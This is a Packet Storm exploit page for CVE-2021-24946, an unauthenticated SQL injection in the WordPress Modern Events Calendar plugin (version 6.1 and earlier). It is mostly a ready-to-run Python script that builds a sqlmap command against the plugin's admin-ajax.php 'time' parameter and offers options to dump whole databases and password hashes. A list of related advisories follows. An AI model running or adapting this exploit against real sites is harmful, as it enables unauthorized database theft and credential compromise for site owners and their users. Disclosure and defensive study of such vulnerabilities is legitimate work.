Lucene search
Ron JostPACKETSTORM:165742HistoryJan 27, 2022 - 12:00 a.m.
WordPress Modern Events Calendar 6.1 SQL Injection
2022-01-2700:00:00
Ron Jost
packetstormsecurity.com
210
0.143 Low
EPSS
Percentile
95.7%
`# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
# Date 26.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip
# Version: <= 6.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24946
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md
'''
Description:
The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter
before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users,
leading to an unauthenticated SQL injection issue
'''
#Banner:
banner = '''
.oOOOo. o 'O o.OOoOoo
.O o O o O .oOOo. .oOOo. .oOOo. oO .oOOo. o O .oOOo. o O .oOOo.
o o O o O O o O O O O o O o O o O
o o o ooOO o o O o o o o o o O o o o
o O O' O ooooooooo O' o o O' O ooooooooo O' OooOOo `OooOo OooOOo OoOOo.
O `o o o O O O O o O O O O O O
`o .o `o O O .O o O .O O .O o o o O o
`OoooO' `o' ooOooOoO oOoOoO `OooO' oOoOoO OooOO oOoOoO O `OooO' O `OooO'
[+] Modern Events Calendar Lite SQL-Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import requests
import argparse
from datetime import datetime
import os
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
# Exploit:
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
exploitcode_risk = ' -p time'
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + retrieve_mode + exploitcode_risk
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
`
Related
nuclei
nuclei
WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection
2023-01-02 13:01:31
zdt
zdt
patchstack
patchstack
prion
prion
Sql injection
2021-12-13 11:15:00
nvd
nvd
CVE-2021-24946
2021-12-13 11:15:09
wpvulndb
wpvulndb
Modern Events Calendar < 6.1.5 - Unauthenticated Blind SQL Injection
2021-11-15 00:00:00
cnvd
cnvd
WordPress Modern Events Calendar Lite PluginSQL Injection Vulnerability
2021-12-18 00:00:00
metasploit
metasploit
WordPress Modern Events Calendar SQLi Scanner
2022-02-03 00:21:42
cvelist
cvelist
cve
cve
CVE-2021-24946
2021-12-13 11:15:09
wpexploit
wpexploit
Modern Events Calendar < 6.1.5 - Unauthenticated Blind SQL Injection
2021-11-15 00:00:00
exploitdb
exploitdb
openvas
openvas
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2022-03-04 21:52:42